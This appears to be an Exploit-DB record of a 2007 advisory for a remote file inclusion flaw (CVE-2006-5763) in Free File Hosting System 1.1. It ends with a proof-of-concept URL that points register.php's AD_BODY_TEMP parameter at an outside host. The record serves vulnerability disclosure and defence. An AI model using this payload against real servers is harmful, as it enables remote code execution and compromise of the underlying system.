Free File Hosting System 1.1 register.php AD_BODY_TEMP Parameter Remote File Inclusion

2007-03-24T00:00:00
ID EDB-ID:29774
Type exploitdb
Reporter IbnuSina
Modified 2007-03-24T00:00:00

Description

Free File Hosting System 1.1 register.php AD_BODY_TEMP Parameter Remote File Inclusion. CVE-2006-5763. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/23118/info
  
Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
  
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
  
Version 1.1 is vulnerable to these issues.
  
This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.
  
This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability. 

http://www.example.com/register.php?AD_BODY_TEMP=http://www.example2.com